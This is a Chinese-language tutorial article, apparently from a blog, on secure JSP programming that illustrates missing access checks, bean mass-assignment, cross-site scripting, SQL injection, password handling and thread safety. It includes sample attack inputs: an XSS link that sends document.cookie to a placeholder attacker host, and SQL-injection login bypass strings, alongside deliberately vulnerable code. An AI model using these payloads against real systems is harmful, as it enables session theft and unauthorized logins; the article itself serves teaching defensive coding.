`

JSP开发的安全编程实例详细解析

 
阅读更多

Java Server Page(JSP)作为建立动态网页的技术正在不断升温。JSP和ASP、PHP、工作机制不太一样。一般说来,JSP页面在执行时是编译式,而不是解释式的。首次调用JSP文件其实是执行一个编译为Servlet的过程。

当浏览器向服务器请求这一个JSP文件的时候,服务器将检查自上次编译后JSP文件是否有改变,如果没有改变,就直接执行Servlet,而不用再重新编译,这样,效率便得到了明显提高。

今天我将和大家一起从脚本编程的角度看JSP的安全,那些诸如源码暴露类的安全隐患就不在这篇文章讨论范围之内了。写这篇文章的主要目的是给初学JSP编程的朋友们提个醒,从一开始就要培养安全编程的意识,不要犯不该犯的错误,避免可以避免的损失。

一、认证不严 低级失误

user_manager.jsp是用户管理的页面,作者知道它的敏感性,加上了一把锁:


<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
if ((session.getValue("UserName")==null)

││(session.getValue("UserClass")==null)

││(! session.getValue

("UserClass").equals("系统管理员")))

{

 response.sendRedirect("err.jsp?id=14");

 return;

}
</td></tr></table>



如果要查看、修改某用户的信息,就要用modifyuser_manager.jsp这个文件。管理员提交http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51

就是查看、修改ID为51的用户的资料(管理员默认的用户ID为51)。

但是,如此重要的文件竟缺乏认证,普通用户(包括游客)也直接提交上述请求也可以对其一览无余(密码也是明文存储、显示的)。modifyuser_manage.jsp同样是门户大开,直到恶意用户把数据更新的操作执行完毕,重定向到user_manager.jsp的时候,他才会看见那个姗姗来迟的显示错误的页面。

显然,只锁一扇门是远远不够的,编程的时候一定要不厌其烦地为每一个该加身份认证的地方加上身份认证。

二、守好JavaBean的入口

JSP组件技术的核心是被称为bean的java组件。在程序中可把逻辑控制、数据库操作放在javabeans组件中,然后在JSP文件中调用它,这样可增加程序的清晰度及程序的可重用性。和传统的ASP或PHP页面相比,JSP页面是非常简洁的,因为许多动态页面处理过程可以封装到JavaBean中。要改变JavaBean属性,要用到“<jsp:setProperty>”标记。

下面的代码是假想的某电子购物系统的源码的一部分,这个文件是用来显示用户的购物框中的信息的,而checkout.jsp是用来结帐的。

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
<jsp:useBean id="myBasket"

class="BasketBean">

<jsp:setProperty

name="myBasket" property="*"/>

<jsp:useBean>

<html>

<head><title>Your

Basket</title></head>

<body>

<p>

You have added the item

<jsp::getProperty name=

"myBasket" property="newItem"/>

to your basket.

<br/>

Your total is $

<jsp::getProperty name=

"myBasket" property="balance"/>

Proceed to <a href=

"checkout.jsp">checkout</a>
</td></tr></table>



注意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是直接通过Query String提交的全部变量的值,将存储到匹配的bean属性中。一般,用户是这样提交请求的:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
http://www.somesite.com

/addToBasket.jsp?newItem=ITEM0105342
</td></tr></table>



但是不守规矩的用户呢?他们可能会提交:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
http://www.somesite.com

/addToBasket.jsp?newItem=ITEM0105342&balance=0
</td></tr></table>



这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击“chekout”结账的时候,费用就全免了。这与PHP中全局变量导致的安全问题如出一辙。由此可见:“property="*"”一定要慎用!

三、长盛不衰的跨站脚本

跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本,窃取浏览此页面的用户的隐私,改变用户的设置,破坏用户的数据。

跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁。举个最简单的例子。当我们提交:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
http://www.somesite.com/acjspbbs

/dispuser.jsp?name=someuser<;script>

alert(document.cookie)</script>
</td></tr></table>



便能弹出包含自己cookie信息的对话框。而提交:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
http://www.somesite.com/acjspbbs

/dispuser.jsp?name=someuser<;script>

document.location='http://www.163.com'</script>
</td></tr></table>



就能重定向到网易。

由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
http://www.somesite.com/acjspbbs

/dispuser.jsp?name=someuser<;script>

document.location='http://www.hackersite.com

/xxx.xxx?'+document.cookie</script>
</td></tr></table>



xxx.xxx用于收集后边跟的参数,而这里参数指定的是document.cookie,也就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。

对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,比如下面的代码就把危险的字符进行替换:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
<% String message =

request.getParameter("message");

message = message.replace ('<','_');

message = message.replace ('>','_');

message = message.replace ('"','_');

message = message.replace ('/'','_');

message = message.replace ('%','_');

message = message.replace (';','_');

message = message.replace ('(','_');

message = message.replace (')','_');

message = message.replace ('&','_');

message = message.replace ('+','_'); %>
</td></tr></table>



更积极的方式是利用正则表达式只允许输入指定的字符:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
public boolean isValidInput(String str)

{

 if(str.matches("[a-z0-9]+")) return true;

 else return false;

}
</td></tr></table>


四、时刻牢记SQL注入

一般的编程书籍在教初学者的时候都不注意让他们从入门时就培养安全编程的习惯。著名的《JSP编程思想与实践》就是这样向初学者示范编写带数据库的登录系统的(数据库为MySQL

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
Statement stmt = conn.createStatement();

String checkUser =

"select * from login where username =

'" + userName + "' and userpassword =

'" + userPassword + "'";

ResultSet rs = stmt.executeQuery(checkUser);

if(rs.next())

 response.sendRedirect("SuccessLogin.jsp");

else

 response.sendRedirect("FailureLogin.jsp");
</td></tr></table>



这样使得尽信书的人长期使用这样先天“带洞”的登录代码。如果数据库里存在一个名叫“jack”的用户,那么在不知道密码的情况下至少有下面几种方法可以登录:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
用户名:jack

密码:' or 'a'='a

用户名:jack

密码:' or 1=1/*

用户名:jack' or 1=1/*

密码:(任意)

lybbs(论坛)ver
</td></tr></table>



Server在LogInOut.java中是这样对登录提交的数据进行检查的:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
if(s.equals("")

││ s1.equals(""))

throw new UserException

("用户名或密码不能空。");

if(s.indexOf("'") != -1

││ s.indexOf("/"") != -1

││ s.indexOf(",") != -1

││ s.indexOf("//") != -1)

throw new UserException

("用户名不能包括 ' /" // , 等非法字符。");

if(s1.indexOf("'")

!= -1 ││ s1.indexOf("/"") != -1

││ s1.indexOf("*") != -1

││ s1.indexOf("//") != -1)

throw new UserException

("密码不能包括 ' /" // * 等非法字符。");

if(s.startsWith(" ")

││ s1.startsWith(" "))

throw new UserException

("用户名或密码中不能用空格。");
</td></tr></table>



但是我不清楚为什么他只对密码而不对用户名过滤星号。另外,正斜杠似乎也应该被列到“黑名单”中。我还是认为用正则表达式只允许输入指定范围内的字符来得干脆。

这里要提醒一句:不要以为可以凭借某些数据库系统天生的“安全性”就可以有效地抵御所有的攻击。pinkeyes的那篇《PHP注入实例》就给那些依赖PHP的配置文件中的“magic_quotes_gpc = On”的人上了一课。

五、String对象带来的隐患

Java平台的确使安全编程更加方便了。Java中无指针,这意味着Java程序不再像C那样能对地址空间中的任意内存位置寻址了。在JSP文件被编译成.class文件时会被检查安全性问题,例如当访问超出数组大小的数组元素的尝试将被拒绝,这在很大程度上避免了缓冲区溢出攻击。

但是,String对象却会给我们带来一些安全上的隐患。如果密码是存储在 Java String 对象中的,则直到对它进行垃圾收集或进程终止之前,密码会一直驻留在内存中。即使进行了垃圾收集,它仍会存在于空闲内存堆中,直到重用该内存空间为止。

密码 String 在内存中驻留得越久,遭到的危险性就越大。更糟的是,如果实际内存减少,则操作系统会将这个密码 String 换页调度到磁盘的交换空间,因此容易遭受磁盘块攻击。为了将这种泄密的可能性降至最低(但不是消除),您应该将密码存储在 char 数组中,并在使用后对其置零(String 是不可变的,无法对其置零)。

六、线程安全初探

“JAVA能做的,JSP就能做”。与ASP、PHP等脚本语言不一样,JSP默认是以多线程方式执行的。以多线程方式执行可大大降低对系统的资源需求,提高系统的并发量及响应时间。线程在程序中是独立的、并发的执行路径,每个线程有它自己的堆栈、自己的程序计数器和自己的局部变量。

虽然多线程应用程序中的大多数操作都可以并行进行,但也有某些操作(如更新全局标志或处理共享文件)不能并行进行。如果没做好线程的同步,在大并发量访问时,不需要恶意用户的“热心参与”,问题也会出现。

最简单的解决方案就是在相关的JSP文件中加上:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
<%@ page isThreadSafe="false" %>
</td></tr></table>



指令,使它以单线程方式执行,这时,所有客户端的请求以串行方式执行。这样会严重降低系统的性能。我们可以仍让JSP文件以多线程方式执行,通过对函数上锁来对线程进行同步。一个函数加上synchronized 关键字就获得了一个锁。看下面的示例:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
public class MyClass

{

int a;

public Init()

{

//此方法可以多个线程同时调用

 a = 0;

}

public synchronized void Set()

{

//两个线程不能同时调用此方法

 if(a>5)

{

  a= a-5;

 }

}

}
</td></tr></table>



但是这样仍然会对系统的性能有一定影响。一个更好的方案是采用局部变量代替实例变量。因为实例变量是在堆中分配的,被属于该实例的所有线程共享,不是线程安全的,而局部变量在堆栈中分配,因为每个线程都有它自己的堆栈空间,所以这样线程就是安全的了。比如凌云论坛中添加好友的代码:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
public void addFriend

(int i, String s, String s1)

throws DBConnectException

{

 try

 {

  if……

  else

  {

   DBConnect dbconnect

= new DBConnect("insert into friend

(authorid,friendname) values (?,?)");

   dbconnect.setInt(1, i);

   dbconnect.setString(2, s);

   dbconnect.executeUpdate();

   dbconnect.close();

   dbconnect = null;

  }

 }

 catch(Exception exception)

 {

  throw new DBConnectException

(exception.getMessage());

 }

}
</td></tr></table>



下面是调用:

<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1> <tr> <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
friendName=ParameterUtils.getString

(request,"friendname");

if(action.equals("adduser"))

{

 forumFriend.addFriend

(Integer.parseInt(cookieID),

friendName,cookieName);

 errorInfo=forumFriend.getErrorInfo();

}
</td></tr></table>



如果采用的是实例变量,那么该实例变量属于该实例的所有线程共享,就有可能出现用户A传递了某个参数后他的线程转为睡眠状态,而参数被用户B无意间修改,造成好友错配的现象。

</td> </tr>

<tr> <td vAlign=top align=left height="100%">

版权声明:本文为博主原创文章,未经博主允许不得转载。

分享到:
评论

相关推荐

    JSP数据库开发实例精粹 源码

    全书各章都穿插着许多JSP开发的技巧,同时突破只讲编程技术,不讲开发思路的桎梏。书中处处渗透着软件工程的思想,希望通过每个系统的开发,提供给读者一些软件设计的理念,除了授人以鱼,同时还授人以渔。 本书的...

    JSP开发技术大全 源码

    软件工程师典藏•JSP开发技术大全》是一本JSP综合开发参考手册,书中几乎囊括了使用JSP进行实用程序开发的全部知识,同时在讲解中结合了大量实用而又有代表性的示例和典型应用。全书共分9篇32章,分别介绍了JSP基础...

    jsp 开发技术大全

    mail组件、程序日志组件、JavaScript脚本语言、CSS样式、XML入门技术、在JSP中应用Ajax技术、在JSP中应用DOM解析XML、在JSP中应用JDOM解析XML、在JSP中应用SAX解析XML、EL表达式、JSTL标签库、自定义标签、Hibernate...

    JSP开发技术大全 JSP

    mail组件、程序日志组件、JavaScript脚本语言、CSS样式、XML入门技术、在JSP中应用Ajax技术、在JSP中应用DOM解析XML、在JSP中应用JDOM解析XML、在JSP中应用SAX解析XML、EL表达式、JSTL标签库、自定义标签、Hibernate...

    JSP网络开发入门与实践

    本书全面、细致地介绍了JSP网络开发技术的原理和基本编程知识,不仅包括JSP开发环境的配置、Java语言基础、JSP语法详解、JSP的内置对象,还包括JavaBean、Servlet和JDBC等高级技术。 全书共分为3篇19章,以“基础...

    jsp应用开发详解.part1(共3 part)

    全书分为6篇共22章,包括JSP应用开发基础、JSP核心语法及实例解析,Servlet技术在JSP开发中的应用、JDBC、基于XML的JSP应用程序以及JSP的完整网站开发实例。本书基于完整的J2EE框架,对JSP编程技术进行了深入而全面...

    jsp应用开发详解.part3(共3 part)

    全书分为6篇共22章,包括JSP应用开发基础、JSP核心语法及实例解析,Servlet技术在JSP开发中的应用、JDBC、基于XML的JSP应用程序以及JSP的完整网站开发实例。本书基于完整的J2EE框架,对JSP编程技术进行了深入而全面...

    jsp应用开发详解.part2(共3 part)

    全书分为6篇共22章,包括JSP应用开发基础、JSP核心语法及实例解析,Servlet技术在JSP开发中的应用、JDBC、基于XML的JSP应用程序以及JSP的完整网站开发实例。本书基于完整的J2EE框架,对JSP编程技术进行了深入而全面...

    JSP 程序设计从入门到精通 PDF 教程

    《JSP程序设计从入门到精通》电子书  第1篇 入门篇 7  第1章 Jsp概述 技术分析 7  1.1 Jsp简介与历史背景 7  1.1.1 日新月异的Web技术 7 ...全书与实际开发结合紧密,是学习JSP开发的一本很易上手的工具书。

    JAVA 范例大全 光盘 资源

    实例199 JSP与Servlet之间的跳转 644 实例200 简单的JSP多人聊天室 653 实例201 Servlet生成的动态图片 658 实例202 简单的JSP上传文件 661 实例203 用Servlet获取Web服务器信息 666 实例204 可选择的图形...

    JAVA编程百例+JAVA面试题集十套(经典)

    列举几个典型实用的例子: 实例37 读取随机文件 实例38 操作EXECL文件 实例39 生成PDF文件 实例47 使用JAVAMAIL发送邮件 实例48 使用JAVAMAIL接收邮件 ...线程编程方面,jsp,jdbc,xml,servlet.pdf 面试题集合.pdf

    ssm025大学生兼职平台的设计与开发+jsp.zip

    提供的源码资源涵盖了Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速...

    JspRun!社区论坛系统 v6.0 bulid 090424 GBK 安装版.rar

    2、修复了jsp脚本在一些特殊条件下会产生一个以上的实例,造成脚本执行不同步 3、修复了jsp脚本下次执行时间错误 4、修复了上传附件数组越界,附件来路检查无效,附件下载付费功能无效,下载附件扣除积分错误 5、...

    《Java编程技巧典型案例解析》随书光盘

    实例2 Java UDP编程及应用 实例7 Java servlet中对模板文件的处理 实例10 在Java应用程序中播放Midi音乐 实例13 基于Java语言的多线程同步机制 实例14 Java程序中的多线程实现 实例15 利用Java的多线程...

    李兴华 java_web开发实战经典 源码 完整版收集共享

    16.6、开发实战讲解(JSP + Oracle) 第17章 Struts高级开发 17.1、Struts多人开发 17.2、Token 17.3、文件上传 17.4、动态ActionForm 17.5、Action深入 17.5.1、ForwardAction 17.5.2、IncludeAction ...

    李兴华 Java Web 开发实战经典_带源码_高清pdf 带书签 下

    16.6、开发实战讲解(JSP + Oracle) 第17章 Struts高级开发 17.1、Struts多人开发 17.2、Token 17.3、文件上传 17.4、动态ActionForm 17.5、Action深入 17.5.1、ForwardAction 17.5.2、IncludeAction ...

Global site tag (gtag.js) - Google Analytics